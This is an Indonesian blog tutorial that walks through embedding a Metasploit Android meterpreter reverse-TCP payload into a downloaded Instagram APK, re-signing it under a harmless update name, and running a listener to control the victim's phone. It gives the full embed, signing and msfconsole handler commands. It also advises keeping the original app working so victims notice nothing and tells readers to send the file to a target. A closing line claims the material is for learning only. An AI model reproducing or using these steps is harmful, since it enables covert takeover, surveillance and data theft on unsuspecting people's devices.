Cara Menyisipkan Backdoor ke Aplikasi Lain

Posted on 12 Mei 2020 by Arief R
cara menyisipkan backdoor ke aplikasi

Jika sebelumnya kita sudah belajar bagaimana cara membuat backdoor, kali ini kita akan mempelajari lagi cara menyisipkan backdoor ke aplikasi lain diandroid.

Tutorial ini berjalan dengan baik, apabila dilakukan dengan Ubuntu atau kali Linux. Untuk menggunakan termux saya belum coba.

Pada postingan kali ini saya akan membahas cara menyiapkan backdoor ke aplikasi android. Dan tool yang digunakan masih metasploit.

Bagi yang belum menginstal tool ini. Silahkan baca dulu cara install metasploit agar bisa melanjutkan tutorial.

Didalam metasploit kita tidak akan membuat backdoor lagi, tapi hanya akan menghubungkan file backdoor yang sudah disisipkan ke aplikasi.

Untuk file backdoor nya bisa kalian download disini.

Dan file aplikasi nya kalian bisa download sendiri. Bisa Instagram, Facebook, Youtube dan lainya. Disini saya menggunakan Instagram sebagai contohnya.

Selanjutnya tinggal memasukkan file backdoor ke aplikasi dan menghubungkan dengan metasploit.

Untuk langkah-langkahnya silahkan ikuti dibawah ini.

Cara Menyisipkan Backdoor ke Aplikasi Instagram

1. Ekstrak file backdoor yang sudah didownload

Kalian bisa menggunakan tool pengekstrak zip. Contohnya ZArchiver atau ESexplore.

Selanjutnya pindahkan folder hasil ekstrak di luar folder apapun untuk mempermudah menemukannya saat dicari dari termux/ubuntu/kali.

2. Masukan aplikasi Instagram ke folder hasil ektrak

Jangan dowload instagram di playstore, karena file nya tidak akan tersimpan didalam penyimpanan.

Tapi download dari web seperti apkpure atau apk miror. Selanjutnya pindahkan filenya ke dalam folder hasil ekstrak.

3. Masukan perintah untuk menyisipkan backdoor ke aplikasi

Pertama silahkan buka tool yang kalian gunakan, baik itu ubuntu, kali linux atau termux.

Apabila kalian menggunakan termux kemungkinan masih bisa dilakukan, Jadi ikuti saja langkah-langkahnya dengan baik.

Masukan perintah berikut untuk menyisipkan backdoor ke Instagram.apk

ruby apk-embed-payload.rb Instagram.apk -p android/meterpreter/reverse_tcp lhost=192.168.1.100 lport=1337

agar tidak gagal, instal dulu ruby dengan perintah pkg instal ruby / apt install ruby

# Instagram.apk adalah nama file aplikasi yang akan disisi backdoor
# lhost ganti dengan IP address kalian
# lport ikuti saja, jika error ubah ke 8080

Tunggu proses penyisipan selesai. Nanti akan muncul apk baru dengan nama Instagram_backdoored.apk

Jika disisi kalian gagal, coba ulangi dan pastikan koneksi internet stabil.

4. Berikan izin aplikasi yang sudah disisipi backdoor agar bisa diinstall di semua android

Caranya :

Masukan kembali perintah

java -jar signapk.jar testkey.x509.pem testkey.pk8 Instagram_backdoored.apk Instagram_Update.apk

# Instagram_Update.apk
Bisa kalian ganti dengan nama lain terserah kalian. Yang terpenting belakang nya harus .apk.

Setelah semuanya siap, kita tinggal menghubungkan aplikasi backdoor dengan metasploit.

5. Hubungkan backdoor dengan metasploit

Proses ini harus dilakukan menggunakan tool metasploit, jadi silakan jalankan dulu metasploit dengan perintah berikut.

msfconsole

Selanjutnya masukkan lagi perintah berikut untuk menghubungkan aplikasi backdoor dengan metasploit.

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.100
set lport 1337
exploit

# lhost dan lport
harus sama dengan yang kalian tulis saat proses menyisipkan backdoor.


Nah sampai disini kita sudah berhasil menyisipkan backdoor ke aplikasi instagram dan sudah siap juga digunakan untuk mengekploit android target.

Jadi kita tinggal mengirimkan file backdoor tersebut ke target dan pastikan target menginstal dan juga menjalankan aplikasi tersebut.

Apa yang terjadi saat target menginstal aplikasi Instagram yang sudah disisipi backdoor?

Tidak akan terjadi apa-apa, target akan menginstal aplikasi Instagram seperti aplikasi biasa tanpa adanya perbedaan.

Hanya saja jika target membuka atau menjalankan aplikasi Instagram, backdoor yang ada didalamnya langsung bekerja.

Selanjutnya di metasploit akan menampilkan data seperti gambar berikut.

cara menyisipkan backdoor ke aplikasi
cara menyisipkan backdoor ke aplikasi

Nah, ditahap ini backdoor sudah terhubung dengan metasploit.

Selanjutnya kalian tinggal masukan saja perintah sesuai keinginan.

Untuk melihat daftar exploitasi kalian bisa cek dengan menu -help.


Oke sekarang kita sudah belajar cara menyisipkan backdoor ke aplikasi lain. Ditambah juga proses menghubungkan backdoor di target dengan metasploit, jadi makin lengkap.

Apabila ada yang masih bingung, silahkan simak video berikut untuk membantu pemahaman.

Cara menyisipkan backdoor ke aplikasi original

Untuk menghindari kecurigaan korban, maka wajib sekali untuk menyiapkan backdoor ke aplikasi original nya. Dengan begitu tidak ada hal aneh yang akan terjadi saat korban menginstal dan menjalankan aplikasi yang sudah disisipi backdoor tersebut.

Dikirim oleh OMcyber pada Senin, 11 Mei 2020
cara menyisipkan backdoor ke aplikasi original

Ingat ini tutorial cara menyisipkan backdoor ke aplikasi ini hanyalah untuk pembelajaran saja. Apabila kalian menggunakannya untuk hal lain, saya tidak bertanggung jawab dengan resiko yang akan terjadi.

Terima kasih sudah membaca..

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *